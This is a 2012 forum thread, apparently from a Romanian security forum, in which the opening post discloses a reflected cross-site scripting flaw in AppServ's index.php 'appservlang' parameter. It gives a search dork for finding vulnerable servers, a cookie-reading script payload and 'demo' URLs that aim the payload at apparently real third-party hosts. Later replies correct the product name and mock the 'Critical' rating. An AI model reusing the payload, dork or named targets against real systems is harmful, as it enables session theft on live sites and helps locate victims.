io.kent Posted September 10, 2012 Report Posted September 10, 2012 Exploit Title: Apache 2.5.9=>2.5.10(win) Xss VulnerabilityAuthor: Angel Injectionurl: http://www.appservnetwork.comSecurity -::RISK: CriticalDork For Keds: intext:"The AppServ Open Project - 2.5.10 for Windows" or intext:"The AppServ Open Project - 2.5.9 for Windows"Exploit index.phpindex.php?appservlang='"()%26%251[cross site scripting]Code<li><a href=\"appserv/ChangeLog.txt\"><span class=\"app\">"._CHANGELOG."</span></a></li><li> <a href=\"appserv/README-$appservlang.php?appservlang=$appservlang\"><span class=\"app\">"._README."</span></a></li><li><a href=\"appserv/AUTHORS.txt\"><span class=\"app\">"._AUTHOR."</span></a></li> <li><a href=\"appserv/COPYING.txt\"><span class=\"app\">"._COPYING."</span></a></li>http://server/index.php?appservlang='"()%26%251[cross site scripting]http://server/index.php?appservlang='"()%26%251"><script>alert(document.cookie)</script>DEMO SITE:http://203.131.209.137/index.php?appservlang=%27%22%28%29%26%251%3Cscript%3Ealert%281337%29%3C/script%3Ehttp://sts.nthu.edu.tw/index.php?appservlang=%27%22%28%29%26%251%3Cscript%3Ealert%281337%29%3C/script%3E Quote
Nytro Posted September 10, 2012 Report Posted September 10, 2012 NU e Apache, e AppServ ala, ce-o mai fi si el.Am redenumit topicul. Quote
alexandrion1212 Posted September 10, 2012 Report Posted September 10, 2012 AppServ is a full-featured of Apache, MySQL, PHP, phpMyAdmin. You can setup in 1 minite. Package of AppServ - Apache - PHP - MySQL - phpMyAdminsursa AppServNetwork Quote
Nytro Posted September 10, 2012 Report Posted September 10, 2012 Directory structure of www file store. • www/appserv AppServ file, you can delete it after install. • www/index.php AppServ index.php file you can delete it after install.Deci nu e niciun XSS in Apache, si "exploit-ul" e un rahat, mai ales pentru ca cica: "Security -::RISK: Critical".E problema in rahatul de pagina web a AppServ. Quote